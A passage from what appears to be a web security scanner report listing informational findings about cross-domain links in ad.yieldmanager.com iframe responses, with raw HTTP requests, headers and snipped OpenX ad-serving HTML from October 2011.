</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317600367_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljE1ugzAQhU.DDlm2MQkW6sLETYQS0yZCqdoNAtsp-QFTQwXK6WuVKhfoaDTzvdGbh4K4oqQKZRlJWp1CGdAYBVguUYkIRT6M4xgjvIwowZj6fZooxhFM2epZLvbstzjl25nc5BHbm1m9RgyMHABirBjn05e
...[SNIP]...
J1FfmxedmIMXs8siffr4eh8wLm4bVrBQZbKj0B0-l2AtI07lieLOhqZ1pbfbK6r72AE-jhxd20-qycWoSQOi0rx-e213YobNkq0xTtd1NpW9Taame4GekcPwXzc1o=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600367_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317600367_HERE" border="0" alt="">
</a>
...[SNIP]...

19.43. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADOZ.y.bePRCpUVSLbJpvV4T3MLte6rRO.QngoDAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1612129670%26r%3D0%26s%3D2126909,fa25f4da-ed54-11e0-8b25-78e7d15f8c7a,1317601005094 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:48 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0051.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:16:48 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601005_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlUMFugzAM.RpuKEpICkxoh1AEYmu6MSGq9oIgSUdpISwwFfXrF5WqPzDLst-znm3ZCAeC1550Xa9yoFhVvgwQdrjnYFF7rg2DIMAO8j2yQhDbYxoKGiGY0vWOuxm9W.QSvS.IxMinWbqwT5-CawQAUZpdl9I
...[SNIP]...
xZXnQfCcP7x0mm.9W2m2kaLEwtJzYuwKQrIWegBtnPgKvOFKujBkNjRLGWRy3HxsIRgZbj3lQvT8Iw1.zNcF4bfOpHqadSV71QXdn.drXUZSO1NIKL4kbxBy9yc2k=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601005_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601005_HERE" border="0" alt="">
</a>
...[SNIP]...

19.44. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABg9ORn3-XRCjCT4Fi4kVwr9-PHAwGQFXjoLR36AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1889338235%26r%3D0%26s%3D2126909,6f408496-ed56-11e0-b342-9f80e0a6d1ca,1317601631058 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:27:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0143.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:27:13 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601631_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT11rhDAQ.DW-SYjxo4r0IV7OIr3YCl7L3YuoidWeGhtTzvrrG-pxf6DLsjszzA6sZYfI4lUJ3YqVzGcV46Flo.oBMc9pmAnDMAwgDHzkesick4hhYsEE7.a1l-G.IgF53pCexMeZ2Nirj8GVAOAISa-b9EV
...[SNIP]...
Tq6dMenUn8ebq9pO8fTbNVajJsbKBYNwNKlowvQEx8XEAtBi2WjQRTq02x5I3kc2vYxIEG8lYx8o5p5rkw0LyuNO7GmUtVyHJkYijG76Hismi55NrQi1o7fgEopnRB,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601631_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317601631_HERE" border="0" alt="">
</a>
...[SNIP]...

19.45. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtoxP4-t.RCkV6jwcN.7yP4qD5GBhbG.f1IMYNAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D861259719%26r%3D0%26s%3D2126909,ec1a04aa-ed52-11e0-ab2b-78e7d15f9cb4,1317600122534 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:56 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0352.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:02:56 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 1
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317600122_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljNFqgzAUhp.GOwlq1Ciyi9jU4lbdCqJ0N2JjXGzVuOiw9OkX6vAFdjic8.2H..wmDChDtKE-bRCEyPLdwIQWRSaykMd0IwgCZPu24yLk6FMc1piYRox3e-qe8LOIT95WUpN4-CRW9eFhsBAAbCGTZT19J56
...[SNIP]...
tvSZb370XaptsjftF1Ps-jBrFmRaprMMuqZncgRjbcARW9OlaNBCNXpkiyRrKJa5DYhma5DzGwtlbKdQxfaXpR3A4Tk3Mpq6EWfTn89BcmS84kU4ZOUOX4BQZKc7o=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600122_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317600122_HERE" border="0" alt="">
</a>
...[SNIP]...

19.46. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhQ1A5.ePRCt97OCwfRDMjAjov0R8mzc2lZjbTAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3586971899%26r%3D0%26s%3D2126909,506aefa8-ed55-11e0-88d7-78e7d15f8a9e,1317601149830 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:19:15 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0311.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:19:15 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601149_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT12LgzAQ.DW-SUjiRxW5B220yNX2BNsDX8QmsZYa40UPpb.-wln6B7osuzPD7MAiK6AU25SyxuccsdrBAbIw3WAXeQ4yYRAE2PM93984jmWOacRCgmAabmPq5uF.EZ98rkhP4oW5XNmXF4KZAGBLlc2r9JN
...[SNIP]...
t2z4qzOO5ip3y-pO8.TLOdpsGwQgMnuhmYVM34AuTA-wVQKbRYNwoMrTYlijeKj61hERsa2H3Int-YZq4Dfc3pReNbP3I1VarumRRV.ysuXFUtV1wbOkm14w9v73OS,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601149_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601149_HERE" border="0" alt="">
</a>
...[SNIP]...

19.47. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACHuKP7v-bRCqvP37Gi53-Mxd6FXaWoIVacMaCvAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3595683931%26r%3D0%26s%3D2126909,f4b3c9c6-ed56-11e0-accc-78e7d1614f42,1317601854950 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:09 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0168.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:31:09 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601854_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlkN9qgzAUxp.GOwlJjH-K7CJWHLLGreBW3I3YJM7aalx0KH36ZbX0BRYOyfcdfucLHOSE0keE1NythBQIb9wQOZj7Dqy5CGwYhiGBnuthz.WhPaaRoDGCKd0euLentxNv4pdVmTsO6D5d3VtAwRwDQJRm89r
...[SNIP]...
dnlhdLZlh2zzHzT7bdTNNgOdTCiSkBJm1WtAA1yH4BXHWmWdUaDI2BEi1rLcfGcmICLexdVS9PwjjPRX-eH40-9aPUU6mrXqiu7H-6o9RlI7U0wEVxQ.wCPeRzig==,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601854_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601854_HERE" border="0" alt="">
</a>
...[SNIP]...

19.48. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANIM65y-XRCkEdS4R3Ohpg89IDW2GceX8AKe3iAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D265139599%26r%3D0%26s%3D2126909,63bcc706-ed56-11e0-a06b-78e7d15f9a12,1317601611740 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:26:52 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0276.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:26:52 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601611_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTdFqgzAU.RrfJJjEporsITYryBq3glTsi9gknV2r6WJGxa9fNkt.oJfLvecczj0X4iSWBDUSkhAfyEJJlECMxBJJiIjwgyRJMIziJcKYhP6QpZIyGGR0VQqypf.FYvY2IzdZRLfZzD4iCm4MgFAbfpulbx4
...[SNIP]...
-82HXv5evI7znu.sX3W2uvHqYeWruWwJpGqhHoq-pHIHTnxOZowLV1prVRR6OG1sMsDDxEJt2rk3SMLOAfFweHT.2gjK1N00vd1f1Pd1CmbpVRznDRwjl-AdDgc3s=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601611_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601611_HERE" border="0" alt="">
</a>
...[SNIP]...

19.49. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4H0cmceDRCl08ukGmnLzek.uwxNTiQ88Jp76AAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2651593533%26r%3D0%26s%3D2126909,32b859ac-ed53-11e0-afb3-78e7d1f5d952,1317600241012 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:01 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0410.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:04:01 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317600241_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTUFugzAQfA03ZGEMwQj1YGIhocZtI9EiuCCwTUgImBqqpHl93RLlA12tdmdGs7MQRa2PhAgbFMqwbblbRxC5PIDYxTKwnSiKXN9BPg6wH9hzGgtCoZOSbc43e.JXNKTPKzKTYrJPV.aGCbhQADyl2WWVPhl
...[SNIP]...
mJnuUFLGkP2T3H3D.Zdrcsk4WI5SamBVh0LeQVqEmOV8DVYMS61WDqjCnRstVy7ixEPcdyNzc1yqMwbOPDX84bg4.jLPVS6XoUaqjGr6GRuuqklsZwVtw4fgCRM3Pk,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600241_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317600241_HERE" border="0" alt="">
</a>
...[SNIP]...

19.50. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAm1vWpI-TRCsuoYdgrioJAYGoEVxN-bS77xGhUAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1870056116%26r%3D0%26s%3D2126909,66d40c8e-ed55-11e0-a7d1-78e7d1629176,1317601187428 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
